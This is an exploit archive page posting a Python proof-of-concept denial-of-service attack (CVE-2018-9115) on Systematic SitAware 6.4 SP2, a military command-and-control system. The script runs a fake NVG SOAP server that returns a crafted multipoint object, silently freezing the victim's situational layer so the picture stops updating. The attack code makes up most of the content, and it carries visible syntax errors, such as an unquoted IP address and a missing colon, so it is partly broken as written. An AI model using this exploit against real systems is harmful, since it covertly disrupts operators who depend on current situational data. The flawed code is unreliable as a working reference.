Systematic SitAware NVG Denial Of Service

Systematic SitAware NVG Denial Of Service: Posted Mar 31, 2018; Authored by 2u53; Systematic SitAware suffers from a denial of service vulnerability.; tags | exploit, denial of service; advisories | CVE-2018-9115; SHA-256 | 4bb760f13fc71196edd91cdf71a8c42c83fa772fbb0a0e2ad4ba3a813ee7e121; Download | Favorite | View

Systematic SitAware NVG Denial Of Service

# Exploit Title: SitAware NVG Denial of Service 
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115
 
# Remarks: PoC needs bottlypy:
# https://bottlepy.org/docs/dev/
# https://raw.githubusercontent.com/bootlepy/bottle/master/bottle.py
 
# Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing 
# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
# that the Situational Picture is no more updated. Unfortunately the user can not notice until 
# he tries to work with the situational layer. 
 
 
#!/bin/python
 
from bottle import post, run, request, response
 
LHOST = 127.0.0.1 # Local IP which the NVG server should use
LPORT = 8080 # Local Port on which the NVG server should listen
 
GET_CAPABILITIES = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetCapabilitiesResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg_capabilities version="1.5">
</ns4:nvg_capabilities>
</ns3:GetCapabilitiesResponse>
</soap:Body>
</soap:Envelope>'''
 
EVIL_NVG = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetNvgResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg version="1.5" classification="NATO UNCLASSIFIED">
<ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X"
label="EVILOBJ"/>
</ns4:nvg>
</ns3:GetNvgResponse>
</soap:Body>
</soap:Envelope>'''
 
@post('/nvg')
def soap():
    action = dict(request.headers.items()).get('Soapaction')
    action = action.replace('"', '')
    print('Incoming connection')
 
    response.content_type = 'text/xml;charset=utf-8'
 
    if action.endswith('nvg/GetCapabilities'):
        print('Sending capabilities to victim'...)
        return GET_CAPABILITIES
        print('Done! Waiting for NVG request...')
    elif action.endswith('nvg/GetNvg'):
        print('Sending evil NVG')
        return EVIL_NVG
        print('Done!')
    else
        print('Invalid request received')
 
run(host=LHOST, port=LPORT)

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 90 files
Gentoo 31 files
Debian 23 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,077)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,339)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,263)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,651)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

Systematic SitAware NVG Denial Of Service

Systematic SitAware NVG Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Systematic SitAware NVG Denial Of Service

Share This

Systematic SitAware NVG Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems